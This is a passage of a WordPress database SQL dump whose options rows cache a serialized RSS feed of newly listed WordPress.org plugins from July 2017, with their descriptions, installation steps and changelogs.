s:14:\"flexible-width\";}}', 'yes'),
(120977, '_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1500234976', 'no'),
(120978, '_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1500234976', 'no'),
(120990, '_transient_timeout_feed_77fa140e07ce53fe8c87136636f83d72', '1500234981', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(120991, '_transient_feed_77fa140e07ce53fe8c87136636f83d72', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"New — WordPress Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wordpress.org/plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"Plugins extend and expand the functionality of WordPress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 16 Jul 2017 07:40:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=4.9-alpha-41062\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Advanced Custom Fields: Price Field\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/plugins/acf-price/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 16 Jul 2017 05:55:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/advanced-custom-fields-price/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"ACF Price field with number formatting.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"speccode\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2244:\"<p><!--section=description--></p>\n<h4>How it works</h4>\n<ul>\n<li>Plugin will store your &#8220;price&#8221; as float so any time you will change desire number format there will be no reformatting problems.</li>\n<li>Best column type in database for &#8220;price&#8221; related fields is decimal. As WordPress keep meta as type &#8220;text&#8221;  I can only cast it to float. Keep it in mind.</li>\n<li>Field validation is &#8220;live&#8221; thanks to https://github.com/teamdf/jquery-number.</li>\n<li>When you use <code>get_field</code> function you will get preformatted number based on your settings.</li>\n</ul>\n<h4>Options</h4>\n<pre><code>format\n</code></pre>\n<p>Available formats:<br />\n* <code>1 337.55</code><br />\n* <code>1 337,55</code><br />\n* <code>1,337.55</code><br />\n* <code>1.337,55</code><br />\n* <code>1337</code><br />\n* <code>1 337</code></p>\n<h4>Default parameters result</h4>\n<pre><code>1 337.00\n</code></pre>\n<h4>Compatibility</h4>\n<p>This ACF field type is compatible with:<br />\n* ACF 5<br />\n* ACF 4</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Copy the <code>acf-price</code> folder into your <code>wp-content/plugins</code> folder</li>\n<li>Activate the Price plugin via the plugins admin page</li>\n<li>Create a new field via ACF and select the Price type</li>\n<li>Please refer to the description for more info regarding the field type settings</li>\n</ol>\n<p><!--section=changelog--></p>\n<h4>[1.2.1] 2017-07-15</h4>\n<ul>\n<li>added translations</li>\n</ul>\n<h4>[1.2.0] 2017-07-02</h4>\n<ul>\n<li>bugfixes</li>\n<li>cleanup file structure</li>\n<li>add support for ACF 4</li>\n</ul>\n<h4>[1.1.0] 2017-06-17</h4>\n<ul>\n<li>added <code>format</code> option</li>\n<li>removed support for ACF 4 (temporary)</li>\n</ul>\n<h4>[1.0.0] 2015-02-02</h4>\n<ul>\n<li>Initation of plugin, no configuration. Only live validation.</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Copy the <code>acf-price</code> folder into your <code>wp-content/plugins</code> folder</li>\n<li>Activate the Price plugin via the plugins admin page</li>\n<li>Create a new field via ACF and select the Price type</li>\n<li>Please refer to the description for more info regarding the field type settings</li>\n</ol>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Unicon extensions\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/unicon-extensions/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Jul 2017 19:08:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/unicon-extensions/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"support for special content types in your website, such as a service Block, client, and&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"themezwp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:456:\"<p><!--section=description--></p>\n<p><strong>NOTE: This plugin is meant for use with the WordPress themes developed by <a href=\"http://themezwp.com\" rel=\"nofollow\">Themez WP</a> theme Promote, which take advantage of it to add service Block, client, and team member, counter. Check them out!</strong></p>\n<p><!--section=changelog--></p>\n<h4>3.0.0</h4>\n<ul>\n<li>Changed tested up to</li>\n</ul>\n<h4>3.0.0</h4>\n<ul>\n<li>First version of the plugin</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Ticketing Widget\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"https://wordpress.org/plugins/strobe-ticketing/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Jul 2017 15:01:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"https://wordpress.org/plugins/strobe-ticketing/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"Display a Strobe org&#039;s current events directly through WordPress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Evan Altman\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2250:\"<p><!--section=description--></p>\n<p>Anyone with a Strobe account can use this plugin! The plugin will allow you to display all current events listed on Strobe directly t a WordPress-powered site or blog.</p>\n<ul>\n<li>no development required!</li>\n<li>sales information stays up to date and consistent</li>\n<li>matches your site&#8217;s style</li>\n</ul>\n<p><!--section=installation--></p>\n<ol>\n<li>Select <code>Download</code> from the WordPress plugins directory.</li>\n<li>Visit the Strobe Dashboard <a href=\"https://dashboard.strobelabs.com/org#ticketing\" rel=\"nofollow\">org settings</a> page to find a secure access token.</li>\n<li>Copy the access token.</li>\n<li>Navigate to the admin settings panel for the <strong>Ticketing Widget</strong> plugin.</li>\n<li>Paste the access token in the designated input box.</li>\n<li>Add a <code>[strobe_event_list]</code> short code wherever you&#8217;d like the list to show up on your site.</li>\n</ol>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Select <code>Download</code> from the WordPress plugins directory.</li>\n<li>Visit the Strobe Dashboard <a href=\"https://dashboard.strobelabs.com/org#ticketing\" rel=\"nofollow\">org settings</a> page to find a secure access token.</li>\n<li>Copy the access token.</li>\n<li>Navigate to the admin settings panel for the <strong>Ticketing Widget</strong> plugin.</li>\n<li>Paste the access token in the designated input box.</li>\n<li>Add a <code>[strobe_event_list]</code> short code wherever you&#8217;d like the list to show up on your site.</li>\n</ol>\n</dd>\n<dt>What do I need to do to use this plugin?</dt>\n<dd>\n<p>Copy your access token from the Strobe Dashboard <a href=\"https://dashboard.strobelabs.com/org#ticketing\" rel=\"nofollow\">org settings</a> and paste it in the plugin Settings on your WordPress site.</p>\n</dd>\n<dt>Where do I find an access token for my org?</dt>\n<dd>\n<p>Visit your Strobe Dashboard <a href=\"https://dashboard.strobelabs.com/org#ticketing\" rel=\"nofollow\">org settings</a> page to find an access token.</p>\n</dd>\n<dt>Who can I contact for additional questions?</dt>\n<dd>\n<p>Email hello@strobelabs.com.</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>1.0.0</h4>\n<ul>\n<li>Initial version</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Popup Maker\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/popup-maker-wp/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Jul 2017 07:55:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/popup-maker-wp/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"Popup Maker is the ultimate tool that will help you run a cleverer and more&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"popupmaker\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:10217:\"<p><!--section=description--></p>\n<p>Rocket the efficiency of your products, the attractiveness of your website, the flow to your website, the traffic at your social accounts, the flexibility of your projects, the number of your core customers, the ease of usage of your website, the lightness of perception of your product and website with Popup Maker.<br />\nPopup Maker is a standalone application with many web platforms&#8217; integrations, including WordPress.<br />\nWith the smart tools of Popup Maker, you can add needed elements and create popups which can contain elements like: Image popup, Countdown popup, HTML popup, Video popup, Subscription popup (with quick sending Newsletter opportunity), Contact popup, Social popup, Iframe popup, Age restriction popup. You can even mix them in one popup, including several elements in one popup. So you can have a Subscription popup with Countdown, or an Image popup with Social buttons &#8211; it&#8217;s all up to your imagination.</p>\n<p><strong>Popup Maker – Features:</strong></p>\n<ul>\n<li>Create and manage as many popups as you want</li>\n<li>Customize the look and feel of the popup</li>\n<li>Set custom animation effects</li>\n<li>Customize popup animation effect</li>\n<li>Choose between several popup templates</li>\n<li>Set popup location on the screen</li>\n<li>Change popup content background color</li>\n<li>Customize popup overlay color and opacity</li>\n<li>Add custom classes for Onclick and On Hover events</li>\n<li>Redirect user to another page when he/she clicks on popup content</li>\n<li>Responsive mode, with layout sizing (media queries)</li>\n<li>Receive notifications after form submission</li>\n<li>Html element for adding custom HTML codes inside the popup</li>\n<li>Promotional image popup element</li>\n<li>Iframe element – you may set the needed URL to load within an iframe. Therefore, popup will load the already set iframe.</li>\n<li>Video element – you can embed YouTube and Vimeo and Daily Motion videos inside your popup.</li>\n<li>Social element – greatest popup for sharing your websites and social accounts by adding &#8220;like&#8221; and &#8220;share&#8221; buttons. Social popup includes all popular social networks, such as Facebook, LinkedIn, Twitter, Google Plus, etc.</li>\n<li>Age restriction element – sometimes the content of specific website might be inappropriate for certain audiences. In these cases, users may not be able to view the content until they pass the age confirmation popup.</li>\n<li>Countdown element – the most flexible way to contact your customers. For instance, your site is under construction and you are planning to open it for a specific time. Therefore, you may just create a countdown popup and fully inform your customers.</li>\n<li>Subscription element – the easiest way to create an efficient connection between users and website owners by using popups. With this simple popup solution, you can quickly collect subscribers in a very pleasant and elegant way. All the subscribers are kept in the Subscribers section, and you can export the list, or delete the subscribers you wish.</li>\n<li>Contact form element – this popup content allows the visitors of your website to write you a message right from the popup.</li>\n<li>Google Analytics (separate extension) – get detailed and exact statistics about the effectiveness of your popups.</li>\n<li>Show popup only when user is scrolling – sometimes you do not want to show the popup right away, it is a good idea to set this option so that show popup to the visitor only while he scrolls.</li>\n<li>Show popup once per visitor – it is a useful option when you do not want to show the popup to the same visitor more than once.</li>\n<li>Do not show popup on mobile devices – after activating this option, popup will not be visible on mobile devices.</li>\n<li>Show popup only on mobile devices – after activating this option, popup will be shown only on mobile devices.</li>\n<li>Disable popup closing – after activating this option, user will not be able to close the popup in any possible way.</li>\n<li>Auto close popup after a specific time – very much useful, if activate it with the previous option. Afterwards, you can disable manual popup closing in order to close it after a certain time.</li>\n<li>Besides the opportunity of displaying popups in WordPress via the API key, we also provide Embed Codes that you can use in any website you wish, be that WP or something else.<br />\nPopup Maker is brilliant if you need to</li>\n<li>Insert some ads to your website to attract users’ attention.</li>\n<li>Redirect users to the pages, which you want them to visit (besides your host website).</li>\n<li>Share videos, images and links of the needed websites.</li>\n<li>Add subscription forms to make your users subscribe to your page.</li>\n<li>Set restrictions for some groups of users, inserting restriction popups created by our popup plugin for your page.<br />\nThere are no limits in your steps. Due to Popup Maker, you can do whatever you want with these popups. Popup Maker gives all the opportunities to its customers. All the possibilities for usage of the popups, in favor of our core customers.</li>\n<li>Popup that show on scroll</li>\n<li>Popup that appear on exit intent</li>\n<li>Popup that show once per visitor</li>\n<li>Popup with disability to close</li>\n<li>Popup with auto closing</li>\n<li>Popup that do not show on mobile</li>\n<li>Popup that appear by user status</li>\n<li>Popup that appear after user&#8217;s inactivity</li>\n</ul>\n<p>Popup a huge portal including powerful modal popups for your WordPress blog or website.</p>\n<p>Why Popup Maker?</p>\n<p>The Answer is more than obvious.</p>\n<ul>\n<li>Templates are provided to ease the creation of popups.</li>\n<li>Unlimited popup creation with their own configuration is allowed.</li>\n<li>Flexible customization options for all the popups in all the possible ways.</li>\n<li>It&#8217;s extremely easy to use, even for newbies.</li>\n<li>The price is unbeatable for all the popups and extensions.</li>\n<li>It provides 6 Months of a trial period before you decide to purchase.</li>\n<li>The opportunity to grab all the visitors&#8217; attention in order to introduce them your offers, discounts and other promotional announcements.</li>\n</ul>\n<p>Popup Maker allows you to add highly customizable popup windows. It affords displaying awesome popups in your WordPress website by simply connecting to your Popup Maker service account by the API key provided. Popup Maker provides a fascinating level of effectiveness for all the settings for each popup. Thus, customers can fully, fundamentally customize all the popup themes, colors, sizes, etc.<br />\nPopups  have become one of the most relevant marketing tools in the 21st century. It is an undeniable fact that a web page with modal popups is much more attractive and visible for conversions than one without popups. In addition, it is much more significant to know that a website with well designed, customized and thoughtfully implemented popups are incomparably better than the web page with a poorly converted popups.<br />\nPopup Maker provides all the opportunities to realize your ideas. You can insert any type of content directly into your Popup. Moreover, you can insert your popup into any page or a post in the easiest and fastest ways. There are popups that open automatically with attracting already surprised visitors&#8217; attention. You have all the keys. Just add some required effects to your popups and visitors would not be able to leave your website unnoticed.<br />\nThe features of Popup Maker will make from your random visitors core customers that hardly wait for the updates of your product to purchase them.<br />\nBy the way, our Popup Maker team works on updates every single day, and our permanent customers would support the fact that we provide many useful updates in a short time period.</p>\n<p>Individual Approach for All Our Customers</p>\n<p>This is much more important, that we do the updates in favor of our customers. Literally saying, our customers write reviews on the WordPress official page under our plugin, or send a message to our support team (support@popupmaker.com) and our team is ready to provide a personal support to each user individually.<br />\nPopup video tutorials (in order to ease the perception); popup relevant images, popup relevant information for a particular article/section; popup your other websites (by redirecting visitors with popups); popup your WordPress blog; popup the announcements (about the sales on your websites); popup countdowns (of your specific discounts); popup animations (considering a tutorial role for your website); popup a unique section for subscription to all your websites and social accounts; popup a section considering a proactive support for customers; popup &#8220;share&#8221; and &#8220;like&#8221; social buttons for Facebook, Google Plus, Instagram, Twitter; popup the age restriction section for specific customers, popup all your unrealized ideas, popup anything you want and make all the available benefits with this relevant tool.</p>\n<p><!--section=installation--></p>\n<p><strong>Using The WordPress Plugins Dashboard</strong></p>\n<ul>\n<li>Go to the &#8216;Add New&#8217; in the plugins dashboard</li>\n<li>Search for &#8216;Popup Maker&#8217;</li>\n<li>Click Install Now button</li>\n<li>Then click Activate Plugin button</li>\n<li>You can see the Popup Maker plugin installed on WordPress left menu</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<p><strong>Using The WordPress Plugins Dashboard</strong></p>\n<ul>\n<li>Go to the &#8216;Add New&#8217; in the plugins dashboard</li>\n<li>Search for &#8216;Popup Maker&#8217;</li>\n<li>Click Install Now button</li>\n<li>Then click Activate Plugin button</li>\n<li>You can see the Popup Maker plugin installed on WordPress left menu</li>\n</ul>\n</dd>\n<dt>Where I can find my API key?</dt>\n<dd>\n<p>You need to create an account at https://popupmaker.com and from your account&#8217;s section click on API key and insert it inside the plugin.</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>1.0</h4>\n<ul>\n<li>Initial commit.</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"b-Locator\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/plugins/b-locator/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Jul 2017 00:27:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/plugins/b-locator/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"b-Locator is a plugin that can generate custom locator ( e.g. Store Locator, Distributor Locator,&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Bryan Sebastian\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1872:\"<p><!--section=description--></p>\n<p>Please be noted that this plugin uses third party service ( Google Map ).</p>\n<p>b-Locator can :<br />\n&#8211; Add location ( long, lat, and details ).<br />\n&#8211; Filter the location by categories.<br />\n&#8211; Search specific location.<br />\n&#8211; Set center of the map.<br />\n&#8211; Set the zoom level.<br />\n&#8211; Set the height of the map.<br />\n&#8211; Modify default map pointer/marker.<br />\n&#8211; Modify default map theme.<br />\n&#8211; Enable/Disable the draggable function of the map.<br />\n&#8211; Enable/Disable double click zoom.<br />\n&#8211; Enable/Disable zoom control.<br />\n&#8211; Enable/Disable scrollwheel for zooming on the map.<br />\n&#8211; Enable/Disable street view.</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Download the b-Locator plugin then paste it the plugin directory or download it via plugin menu of admin&#8217;s backend.</li>\n<li>Activate the plugin.</li>\n<li>Configure the settings in b-Locator menu.</li>\n<li>Add location in Custom Post Type Location.</li>\n<li>Use the shortcode [b-locator] to show the list of locations</li>\n<li>use the shortcode [b-locator-map] to show the map</li>\n</ol>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Download the b-Locator plugin then paste it the plugin directory or download it via plugin menu of admin&#8217;s backend.</li>\n<li>Activate the plugin.</li>\n<li>Configure the settings in b-Locator menu.</li>\n<li>Add location in Custom Post Type Location.</li>\n<li>Use the shortcode [b-locator] to show the list of locations</li>\n<li>use the shortcode [b-locator-map] to show the map</li>\n</ol>\n</dd>\n<dt>Why there are two shortcodes that you need to use?</dt>\n<dd>\n<p>To place them wherever you want. Sample at the top you want to place the list of locations and at the bottom the google map.</p>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Give to ZBS CRM Connector\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/zbs-give-extension/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Jul 2017 21:27:12 